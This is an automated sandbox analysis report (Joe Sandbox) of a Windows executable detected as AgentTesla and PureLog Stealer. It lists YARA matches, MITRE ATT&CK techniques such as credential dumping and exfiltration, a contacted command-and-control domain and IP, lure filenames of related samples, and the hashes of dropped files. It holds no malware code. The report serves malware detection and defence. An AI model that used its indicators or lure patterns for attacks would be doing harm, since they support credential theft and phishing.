                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 20240328-REV2.exe PID: 4788, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.436e7a0.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.4345780.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.20240328-REV2.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.436e7a0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 20240328-REV2.exe PID: 4788, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.6d50000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.3799970.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		111
                        Process Injection                        		1
                        Masquerading                        		2
                        OS Credential Dumping                        		131
                        Security Software Discovery                        		Remote Services1
                        Email Collection                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		1
                        Credentials in Registry                        		1
                        Process Discovery                        		Remote Desktop Protocol11
                        Archive Collected Data                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)151
                        Virtualization/Sandbox Evasion                        		Security Account Manager151
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin Shares2
                        Data from Local System                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information                        		Cached Domain Credentials24
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                        Software Packing                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        20240328-REV2.exe45%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                        20240328-REV2.exe44%VirustotalBrowse
                        20240328-REV2.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        mbarieservicesltd.com1%VirustotalBrowse
                        mail.mbarieservicesltd.com5%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://mail.mbarieservicesltd.com100%Avira URL Cloudmalware
                        http://mbarieservicesltd.com0%Avira URL Cloudsafe
                        http://mbarieservicesltd.com1%VirustotalBrowse
                        http://mail.mbarieservicesltd.com5%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mbarieservicesltd.com
                        		199.79.62.115
                        		truetrueunknown
                        mail.mbarieservicesltd.com
                        		unknown
                        		unknowntrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://upx.sf.netAmcache.hve.8.drfalse
                          		high
                          http://mbarieservicesltd.com20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name20240328-REV2.exe, 00000001.00000002.1581428931.000000000280D000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://mail.mbarieservicesltd.com20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 5%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            199.79.62.115
                            		mbarieservicesltd.comUnited States
                            		394695PUBLIC-DOMAIN-REGISTRYUStrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1432024
                            Start date and time:2024-04-26 10:05:18 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:20240328-REV2.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@8/11@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 149
                            • Number of non-executed functions: 27
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.22
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            10:06:25API Interceptor22x Sleep call for process: 20240328-REV2.exe modified
                            10:06:27API Interceptor15x Sleep call for process: powershell.exe modified
                            10:06:33API Interceptor1x Sleep call for process: WerFault.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            199.79.62.115PO82100088.exeGet hashmaliciousAgentTeslaBrowse
                              WNGO8CYRZG.exeGet hashmaliciousAgentTeslaBrowse
                                F0A7vyQAuZ.exeGet hashmaliciousAgentTeslaBrowse
                                  quote N4302-088.exeGet hashmaliciousAgentTeslaBrowse
                                    Quote#U00a0UPDATE#U00a0#U00a027-03-24.exeGet hashmaliciousAgentTeslaBrowse
                                      Quote_Q9555.exeGet hashmaliciousAgentTeslaBrowse
                                        Quote#U00a0UPDATE#U00a0#U00a027-03-24.exeGet hashmaliciousAgentTeslaBrowse
                                          124431-OFFER.exeGet hashmaliciousAgentTeslaBrowse
                                            Quote_90002010.exeGet hashmaliciousAgentTeslaBrowse
                                              PO234400.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PUBLIC-DOMAIN-REGISTRYUSPayment.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.198.143
                                                SecuriteInfo.com.Win32.PWSX-gen.29608.5434.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.91.199.224
                                                Dhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223
                                                BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249
                                                PR2403016.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223
                                                BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249
                                                OKJ2402PRT000025.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.224
                                                PO82100088.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                • 162.215.248.214
                                                Urgent PO 18-3081 Confirmation.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.224

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_20240328-REV2.ex_d0d499a9646a641b819fa0255edad0bdab418090_3cf00dc3_f546981a-4c8e-4734-9074-23d81c861b04\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.2832140247113648
                                                Encrypted:false
                                                SSDEEP:192:mxghY+0BU/iaGOJo1ZrFHqozuiFPZ24IO8r:kghCBU/iahMrzuiFPY4IO8r
                                                MD5:A2010789470B29C8154CF3AC293574EA
                                                SHA1:EEEDE969E6723B572B6A019824C49DE8126FCE05
                                                SHA-256:2BE9EC8A56CFF7508FBBE2822C156BF4A098FE579FC3C89D01B972DED9CD8D3D
                                                SHA-512:B99F697F18099C1E37915FBEB7143A208EFB062877E171AD31BBDB0F2E3AD9BE7246B64FC156F2EA3DB924E9A9B49E1E8373027599A837EA1CFBBAF01FE42E3D
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.3.8.7.6.0.2.0.1.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.3.8.8.7.1.1.3.8.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.4.6.9.8.1.a.-.4.c.8.e.-.4.7.3.4.-.9.0.7.4.-.2.3.d.8.1.c.8.6.1.b.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.1.b.6.7.9.a.-.5.0.1.b.-.4.8.5.4.-.8.f.0.d.-.b.c.6.7.d.9.1.4.b.0.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.0.2.4.0.3.2.8.-.R.E.V.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X.Z.W...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.b.8.-.0.0.0.1.-.0.0.1.4.-.c.c.3.0.-.2.c.a.2.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.1.e.f.b.7.d.8.8.b.b.f.d.1.3.c.c.9.b.4.2.c.3.0.0.e.f.a.6.d.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.4.2.e.b.4.e.6.0.8.4.a.c.9.1.d.1.f.a.d.3.e.f.9.f.e.0.1.d.8.d.3.e.9.d.b.0.c.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DE2.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:06:28 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):356231
                                                Entropy (8bit):4.107414333063161
                                                Encrypted:false
                                                SSDEEP:3072:YNfHlYbLpmmEut8Iyf394uEqlg5J5LTgTLjphMCXAMbr:YhlYbwmbt8IyfN4IATgYCXAMb
                                                MD5:3A7EFCE410CFDC6C67C168409BA2CCC1
                                                SHA1:6DF2F2BADBE1B619E7E7E681E36A674CBD33C60E
                                                SHA-256:1FB7F4E52C4B05BF4FE53BCB2AD12990E806699E7DAC1E15F19C6CDC44189F4E
                                                SHA-512:39CFD46A87EAACB4B9305550C48959F90B99E52BE101F557D11699919C2356C0F398D436C712CC60E716BD685ECD3C2F61173F8FBBBED06452DD751D692522F6
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ........`+f........................t#..........$...\-.......0...g..........`.......8...........T............C...+...........-..........l/..............................................................................eJ.......0......GenuineIntel............T............`+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER60A2.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8418
                                                Entropy (8bit):3.6965566573319495
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJIK6oh6YSGYSU9dMgmfZpXprjx89bSV7wsf0Amm:R6lXJV6oh6YrYSU9WgmfXYS9fZ
                                                MD5:722DDA7C42AD8A8EA0683C1DA0C67D34
                                                SHA1:28AFCFE6672EFCC3C37A8F2D80825390846DBB75
                                                SHA-256:17550E7BF9514888D6A7307E9F2DFF43B34C13954297CA87D9EFA333A599F9E8
                                                SHA-512:B9E09F1596F77F97ABFC72C1F35A3C7A37AB116BCEE5B1C4DD9B1184E7D43816B3F8F4E6F9B63DF3618A422D70FD36F6D2068E8101E720C97BADFED681C8CB04
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.0.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER6101.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4751
                                                Entropy (8bit):4.474658268377554
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zstJg77aI97AWpW8VYXhYm8M4JjhFkNo+q8vaaNxq/qd:uIjfHI7t57VWAJ8NoK7O/qd
                                                MD5:2F27562D056D295F3AA59E71D231EC8A
                                                SHA1:135D6886222A921A75A7DBB9465785EAA700DAC2
                                                SHA-256:D4F1E4B0B11472449382DB1A2D439543E6E1D5B5ED939AA72CA5A6CA7FB1CBFD
                                                SHA-512:7588681EA7341EC8A70CFF4BC1DA63449D768135D669618798B67872E089E109328EA68E9B7C862E13B30CABE6E0E0F962ACB21A6E8B6BE71C79CE76B1155300
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20240328-REV2.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\20240328-REV2.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2232
                                                Entropy (8bit):5.379401388151058
                                                Encrypted:false
                                                SSDEEP:48:fWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:fLHxcIalLgZ2KRHWLOug8s
                                                MD5:6EFC00BBF21EB6D04A4F584932EE52E2
                                                SHA1:5046755E9D3154F66AAAE20B582B02A5A6ED51E5
                                                SHA-256:49923B1A86502BE5C3F109E07820A7AA03914E0263D247368792232A4A8E9F66
                                                SHA-512:8EA293396D7124BBD83E092D5320F5CFD2D7C0E2B2C70B2C1B3A4C202CC38D8466C6E71B7B10FE210D29DE5719AB17A04C0F2AD194688F6F1F60BE9FE50523FA
                                                Malicious:false
                                                Reputation:low
                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e22pavwa.f3a.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tckzrrwj.5ng.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yakagxcv.e30.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv2kgg4g.glx.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.372256882851346
                                                Encrypted:false
                                                SSDEEP:6144:/FVfpi6ceLP/9skLmb02yWWSPtaJG8nAge35OlMMhA2AX4WABlguNwiL:tV1UyWWI/glMM6kF7Wq
                                                MD5:9827F7439DF466540DD61B68F581F17A
                                                SHA1:1308B1F3C3357D497D72DAA5C31FE4A364A7526E
                                                SHA-256:0E55C6859E65ADA4B4A076E0200E64BE48B50640595D0F242DBB98B478D9B1E8
